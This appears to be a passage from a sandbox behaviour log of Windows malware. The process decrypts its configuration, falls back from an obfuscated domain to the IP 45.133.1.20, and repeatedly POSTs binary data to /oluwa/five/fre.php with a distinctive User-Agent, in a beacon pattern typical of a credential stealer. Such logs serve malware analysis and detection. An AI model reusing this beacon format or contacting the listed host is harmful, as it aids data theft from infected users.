() returned 0x6a0000 [0226.017] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bec18 [0226.017] GetProcessHeap () returned 0x6a0000 [0226.017] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6d8f18 [0226.018] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0226.019] wvsprintfA (in: param_1=0x6d8f18, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0226.019] GetProcessHeap () returned 0x6a0000 [0226.019] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bd460 [0226.019] GetProcessHeap () returned 0x6a0000 [0226.020] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d8f18 | out: hHeap=0x6a0000) returned 1 [0226.020] GetProcessHeap () returned 0x6a0000 [0226.020] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4760 [0226.020] GetProcessHeap () returned 0x6a0000 [0226.020] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6d8f18 [0226.021] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0226.022] wvsprintfA (in: param_1=0x6d8f18, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0226.022] GetProcessHeap () returned 0x6a0000 [0226.022] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6b5c98 [0226.022] GetProcessHeap () returned 0x6a0000 [0226.023] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d8f18 | out: hHeap=0x6a0000) returned 1 [0226.023] send (s=0x6b4, buf=0x6b5c98*, len=242, flags=0) returned 242 [0226.023] send (s=0x6b4, buf=0x6bb998*, len=159, flags=0) returned 159 [0226.023] GetProcessHeap () returned 0x6a0000 [0226.023] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6720 [0226.023] recv (in: s=0x6b4, buf=0x6c6720, len=4048, flags=0 | out: buf=0x6c6720*) returned 204 [0226.110] GetProcessHeap () returned 0x6a0000 [0226.111] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5c98 | out: hHeap=0x6a0000) returned 1 [0226.111] GetProcessHeap () returned 0x6a0000 [0226.111] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0226.111] GetProcessHeap () returned 0x6a0000 [0226.112] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0226.112] GetProcessHeap () returned 0x6a0000 [0226.112] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bec18 | out: hHeap=0x6a0000) returned 1 [0226.112] closesocket (s=0x6b4) returned 0 [0226.113] GetProcessHeap () returned 0x6a0000 [0226.113] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baad0 | out: hHeap=0x6a0000) returned 1 [0226.113] GetProcessHeap () returned 0x6a0000 [0226.113] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0226.114] GetProcessHeap () returned 0x6a0000 [0226.115] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0226.115] GetProcessHeap () returned 0x6a0000 [0226.115] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0226.115] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6720, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x4d4) returned 0x6b4 [0226.117] Sleep (dwMilliseconds=0xea60) [0226.119] GetProcessHeap () returned 0x6a0000 [0226.119] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0226.119] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0226.120] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0226.128] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0226.129] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0226.137] GetProcessHeap () returned 0x6a0000 [0226.137] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0226.137] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0226.138] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0226.139] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0226.139] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0226.141] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0226.142] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0226.142] GetProcessHeap () returned 0x6a0000 [0226.142] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0226.143] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0226.144] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0226.144] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0226.145] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0226.146] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0226.146] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0226.146] GetProcessHeap () returned 0x6a0000 [0226.146] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0226.149] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0226.157] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0226.160] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0226.161] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0226.162] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0226.162] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0226.163] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0226.164] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0226.164] GetProcessHeap () returned 0x6a0000 [0226.164] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0226.164] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0226.164] GetProcessHeap () returned 0x6a0000 [0226.164] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0226.165] GetProcessHeap () returned 0x6a0000 [0226.165] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0226.165] GetProcessHeap () returned 0x6a0000 [0226.165] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0226.165] GetProcessHeap () returned 0x6a0000 [0226.165] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0226.166] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0226.167] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0226.176] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0226.176] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0226.186] GetProcessHeap () returned 0x6a0000 [0226.186] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0226.187] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0226.187] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0226.188] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0226.189] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0226.190] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0226.190] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0226.190] GetProcessHeap () returned 0x6a0000 [0226.190] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0226.194] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0226.195] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0226.196] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0226.196] CryptDestroyKey (hKey=0x6ad020) returned 1 [0226.197] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0226.197] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0226.197] GetProcessHeap () returned 0x6a0000 [0226.197] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0226.198] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0226.198] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0226.199] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0226.200] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0226.201] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0226.201] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0226.205] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0226.205] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0226.206] GetProcessHeap () returned 0x6a0000 [0226.206] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0226.206] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0226.206] GetProcessHeap () returned 0x6a0000 [0226.206] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa00 [0226.206] socket (af=2, type=1, protocol=6) returned 0x6b8 [0226.206] connect (s=0x6b8, name=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0226.229] FreeAddrInfoW (pAddrInfo=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0226.229] GetProcessHeap () returned 0x6a0000 [0226.229] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf168 [0226.229] GetProcessHeap () returned 0x6a0000 [0226.229] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6d8f18 [0226.230] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0226.231] wvsprintfA (in: param_1=0x6d8f18, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0226.231] GetProcessHeap () returned 0x6a0000 [0226.231] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bd460 [0226.231] GetProcessHeap () returned 0x6a0000 [0226.232] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d8f18 | out: hHeap=0x6a0000) returned 1 [0226.232] GetProcessHeap () returned 0x6a0000 [0226.232] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4be0 [0226.232] GetProcessHeap () returned 0x6a0000 [0226.232] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6d8f18 [0226.233] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0226.234] wvsprintfA (in: param_1=0x6d8f18, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0226.236] GetProcessHeap () returned 0x6a0000 [0226.236] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6b5c98 [0226.236] GetProcessHeap () returned 0x6a0000 [0226.236] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d8f18 | out: hHeap=0x6a0000) returned 1 [0226.236] send (s=0x6b8, buf=0x6b5c98*, len=242, flags=0) returned 242 [0226.237] send (s=0x6b8, buf=0x6bb998*, len=159, flags=0) returned 159 [0226.237] GetProcessHeap () returned 0x6a0000 [0226.237] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6720 [0226.237] recv (in: s=0x6b8, buf=0x6c6720, len=4048, flags=0 | out: buf=0x6c6720*) returned 204 [0226.305] GetProcessHeap () returned 0x6a0000 [0226.306] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5c98 | out: hHeap=0x6a0000) returned 1 [0226.306] GetProcessHeap () returned 0x6a0000 [0226.306] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0226.306] GetProcessHeap () returned 0x6a0000 [0226.307] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0226.307] GetProcessHeap () returned 0x6a0000 [0226.307] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf168 | out: hHeap=0x6a0000) returned 1 [0226.308] closesocket (s=0x6b8) returned 0 [0226.308] GetProcessHeap () returned 0x6a0000 [0226.308] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa00 | out: hHeap=0x6a0000) returned 1 [0226.308] GetProcessHeap () returned 0x6a0000 [0226.309] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0226.309] GetProcessHeap () returned 0x6a0000 [0226.309] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0226.310] GetProcessHeap () returned 0x6a0000 [0226.310] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0226.310] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6720, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x938) returned 0x6b8 [0226.313] Sleep (dwMilliseconds=0xea60) [0226.443] GetProcessHeap () returned 0x6a0000 [0226.443] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0226.449] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0226.449] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0226.467] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0226.468] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beb90) returned 1 [0226.480] GetProcessHeap () returned 0x6a0000 [0226.480] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0226.481] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0226.481] CryptImportKey (in: hProv=0x6beb90, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0226.482] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0226.483] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0226.484] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0226.484] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0226.484] GetProcessHeap () returned 0x6a0000 [0226.485] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0226.486] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0226.486] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0226.491] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0226.491] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0226.492] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0226.493] CryptReleaseContext (hProv=0x6beb90, dwFlags=0x0) returned 1 [0226.493] GetProcessHeap () returned 0x6a0000 [0226.493] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0226.493] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0226.494] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0226.495] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0226.495] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0226.496] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0226.496] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0226.497] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0226.497] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0226.497] GetProcessHeap () returned 0x6a0000 [0226.498] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0226.498] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0226.498] GetProcessHeap () returned 0x6a0000 [0226.499] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0226.499] GetProcessHeap () returned 0x6a0000 [0226.500] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0226.500] GetProcessHeap () returned 0x6a0000 [0226.500] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0226.500] GetProcessHeap () returned 0x6a0000 [0226.500] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0226.501] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0226.501] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0226.518] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0226.519] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bed28) returned 1 [0226.538] GetProcessHeap () returned 0x6a0000 [0226.538] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0226.539] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0226.539] CryptImportKey (in: hProv=0x6bed28, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad060) returned 1 [0226.540] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0226.541] CryptSetKeyParam (hKey=0x6ad060, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0226.542] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0226.543] CryptSetKeyParam (hKey=0x6ad060, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0226.543] GetProcessHeap () returned 0x6a0000 [0226.543] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0226.544] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0226.544] CryptDecrypt (in: hKey=0x6ad060, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0226.545] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0226.546] CryptDestroyKey (hKey=0x6ad060) returned 1 [0226.546] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0226.547] CryptReleaseContext (hProv=0x6bed28, dwFlags=0x0) returned 1 [0226.547] GetProcessHeap () returned 0x6a0000 [0226.547] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0226.548] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0226.548] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0226.549] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0226.550] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0226.551] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0226.551] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0226.555] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0226.556] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0226.556] GetProcessHeap () returned 0x6a0000 [0226.556] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0226.556] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0226.556] GetProcessHeap () returned 0x6a0000 [0226.556] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba9b0 [0226.556] socket (af=2, type=1, protocol=6) returned 0x6bc [0226.557] connect (s=0x6bc, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0226.582] FreeAddrInfoW (pAddrInfo=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0226.582] GetProcessHeap () returned 0x6a0000 [0226.582] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bec18 [0226.582] GetProcessHeap () returned 0x6a0000 [0226.582] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6d8f18 [0226.583] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0226.584] wvsprintfA (in: param_1=0x6d8f18, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0226.585] GetProcessHeap () returned 0x6a0000 [0226.585] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) 